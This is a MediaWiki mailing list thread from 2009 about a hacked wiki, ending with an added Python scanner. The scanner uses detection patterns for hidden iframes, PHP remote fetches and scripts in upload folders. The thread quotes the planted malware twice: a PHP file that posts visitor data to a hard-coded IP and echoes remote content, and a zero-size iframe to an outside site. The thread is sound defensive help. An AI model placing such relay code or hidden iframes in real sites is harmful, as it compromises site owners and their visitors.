I got an email from someone accessing my wiki:
http://against-the-day.pynchonwiki.com/wiki/index.php?title=Main_Page
I'm using v 1.9.3
Here's the message I received:
I get a message from Avast anti-virus that the page is infected with: HTML:Iframe-inf. I have contacted Avast who says this is not a false positive. You can Google virus name--it seems that this infection is fairly common. Please let me know if the infection is real--I would like to use the wiki.
Any idea of what I should do to address this?
Thanks! Tim
Tim Ware
HyperArts .. 201 4th Street, Ste 404 .. Oakland CA 94607
t: (510) 339-6084 .. f: (510) 339-6086 .. e: tim@hyperarts.com
twitter.com/hyperarts .. http://www.hyperarts.com
You seem to also have external content running on there such as m-analytics and addthis, try removing them and asking them to check again. If it still happens then you can confirm a MediaWiki problem, but I suspect it may be the analytics or similar triggering this as it's the only content loading in an iframe and this is what the error seems to suggest.
Regards
Mark
On Mon, Jun 22, 2009 at 7:59 PM, Tim Ware tim@hyperarts.com wrote:
I got an email from someone accessing my wiki:
http://against-the-day.pynchonwiki.com/wiki/index.php?title=Main_Page
I'm using v 1.9.3
Here's the message I received:
I get a message from Avast anti-virus that the page is infected with: HTML:Iframe-inf. I have contacted Avast who says this is not a false positive. You can Google virus name--it seems that this infection is fairly common. Please let me know if the infection is real--I would like to use the wiki.
Any idea of what I should do to address this?
Thanks! Tim
MediaWiki-l mailing list MediaWiki-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/mediawiki-l
I notice several files that seem to have been modified at the docroot level:
foter.php (never noticed this one before) with this content:
<?php
$ip = '209.62.27.83';
$port = '80';
$path = '/linkr/get/';
$fp = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$fp) {
    echo '';
} else {
    $post = "u = ".rawurlencode($_SERVER['HTTP_USER_AGENT'])."&h=".rawurlencode($_SERVER['SERVER_NAME']);
    $out = "POST ".$path." HTTP/1.0\r\n";
    $out .= "Host: ".$ip.":".$port."\r\n";
    $out .= "Content-Type: text/html\r\n";
    $out .= "Content-Length: ".strlen($post)."\r\n";
    $out .= "Connection: Close\r\n";
    $out .= "\r\n";
    $out .= $post;
    fwrite($fp, $out);
    $resp = '';
    while (!feof($fp)) {
        $resp .= fgets($fp, 128);
    }
    fclose($fp);
    $paths = split("\r\n\r\n", $resp);
    echo $paths[1];
}
?>
and this "m-analytics" code was added to an old index page and a google verification page:
<iframe src="http://m-analytics.net/qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a " width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Same thing happened to another wiki on this site, where the m-analytics iframe was added. I *did not* add this, so I suspect foul play.
Thoughts?
Tim
On Jun 22, 2009, at 12:05 PM, Mark (Markie) wrote:
You seem to also have external content running on there such as m-analytics and addthis, try removing them and asking them to check again. If it still happens then you can confirm a MediaWiki problem, but I suspect it may be the analytics or similar triggering this as it's the only content loading in an iframe and this is what the error seems to suggest.
Regards
Mark
Tim Ware wrote:
Same thing happened to another wiki on this site, where the m-analytics iframe was added. I *did not* add this, so I suspect foul play.
Thoughts?
If PHP files on your web space are changed without your knowledge and permission, then you have been hacked. Once someone has the ability to change your files, there is nothing MediaWiki can do about it.
I suggest making a backup of your database, plus an XML dump for good measure, scrap everything and start with a fresh install. MediaWiki 1.9.3 is not only old btw, but also missing several security updates... Current version is 1.15 (!), current patch level of 1.9 is 1.9.6, but it's no longer supported and doesn't receive patches any more.
Good luck Daniel
Tim Ware wrote:
I notice several files that seem to have been modified at the docroot level:
foter.php (never noticed this one before) with this content:
<?php
$ip = '209.62.27.83';
$port = '80';
$path = '/linkr/get/';
$fp = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$fp) {
    echo '';
} else {
    $post = "u = ".rawurlencode($_SERVER['HTTP_USER_AGENT'])."&h=".rawurlencode($_SERVER['SERVER_NAME']);
    $out = "POST ".$path." HTTP/1.0\r\n";
    $out .= "Host: ".$ip.":".$port."\r\n";
    $out .= "Content-Type: text/html\r\n";
    $out .= "Content-Length: ".strlen($post)."\r\n";
    $out .= "Connection: Close\r\n";
    $out .= "\r\n";
    $out .= $post;
    fwrite($fp, $out);
    $resp = '';
    while (!feof($fp)) {
        $resp .= fgets($fp, 128);
    }
    fclose($fp);
    $paths = split("\r\n\r\n", $resp);
    echo $paths[1];
}
?>
and this "m-analytics" code was added to an old index page and a google verification page:
<iframe src="http://m-analytics.net/qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a " width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Same thing happened to another wiki on this site, where the m-analytics iframe was added. I *did not* add this, so I suspect foul play.
Thoughts?
Tim
Back up everything and start from scratch. The only files from the wiki you should need to keep are the uploads. Remember to verify there aren't scripts there.
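
A sweep for the three things this thread turned up (zero-size iframes, PHP files that relay remote content, and scripts hiding among the uploads), written as an added example and not code from any poster or from MediaWiki. It assumes the upload directory is `images` under the docroot; the regexes, the function names and the sample files are constructed for illustration.

```python
import os
import re
import tempfile

# Heuristics taken from the artifacts quoted in this thread (assumptions, tune per site).
HIDDEN_IFRAME = re.compile(rb"<iframe\b[^>]*\b(?:width|height)\s*=\s*[\"']?0\b", re.I)
PHP_TAG = re.compile(rb"<\?php", re.I)
REMOTE_FETCH = re.compile(rb"\b(?:fsockopen|curl_exec)\s*\(", re.I)
SCRIPT_EXT = (".php", ".phtml", ".php5", ".pl", ".cgi")

def scan_tree(root, uploads_dir="images"):
    """Return a sorted list of (relative_path, reason) findings under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            try:
                with open(path, "rb") as fh:
                    data = fh.read(2_000_000)  # first 2 MB is enough for these markers
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            has_php = bool(PHP_TAG.search(data))
            if HIDDEN_IFRAME.search(data):
                findings.append((rel, "zero-size iframe"))
            if has_php and REMOTE_FETCH.search(data):
                findings.append((rel, "PHP relays remote content"))
            if rel.startswith(uploads_dir + "/") and (
                    has_php or name.lower().endswith(SCRIPT_EXT)):
                findings.append((rel, "script in uploads"))
    return sorted(findings)

def build_sample(root):
    """Write a small constructed docroot (not the real site's files) for the demo."""
    files = {
        "index.html": b'<html><iframe src="http://example.invalid/x" width=0 height=0></iframe></html>',
        "foter.php": b"<?php $fp = fsockopen('192.0.2.1', 80); echo fgets($fp, 128); ?>",
        "LocalSettings.php": b"<?php $wgSitename = 'Demo'; ?>",
        "images/a/photo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
        "images/a/avatar.jpg": b"\xff\xd8\xff\xe0JFIF<?php echo 1; ?>",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for rel, reason in scan_tree(tmp):
            print(f"{reason:28} {rel}")
```

A clean result from a sweep like this does not show the site is clean; it only narrows what to inspect by hand before copying the uploads into the fresh install.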